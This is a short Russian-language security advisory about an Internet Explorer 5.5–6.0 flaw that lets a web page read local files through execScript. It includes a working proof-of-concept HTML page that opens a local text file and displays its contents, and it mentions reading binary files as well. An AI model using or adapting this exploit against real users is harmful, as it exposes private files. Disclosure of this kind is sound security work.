Уязвимость в IE позволяет читать и посылать местные файлы.
Проблема связанна с возможностью обратится к DOM локального файла, вызывая функцию execScript в созданном новом окне. Эксплоит, приведенный ниже, позволяет читать файлы через броузер, но также возможно прочитать любые другие двоичные файлы (прикрепляя событие к DOM, затем вызывая httpxmlcomponent). Для успешной эксплуатации требуется знать имя файла.

Уязвимость найдена в IE 5.5-6.0. 

Эксплоит
Для проверки уязвимости, создайте файл test.txt c любым текстом, а затем просмотрите следующую страницу:

<html>
<head>
<title>Example exploit</title>

<script language="javascript">

var extDoc

function doIt() {

extDoc = document.open('file:///C:/test.txt','jelmer','height=200,width=400,status=no, toolbar=no,menubar=no,location=no');

cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';
setTimeout(cmd,2000); 

}

</script>

</head>
<body onload="doIt()">
Wait to 2 seconds
</body>

</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии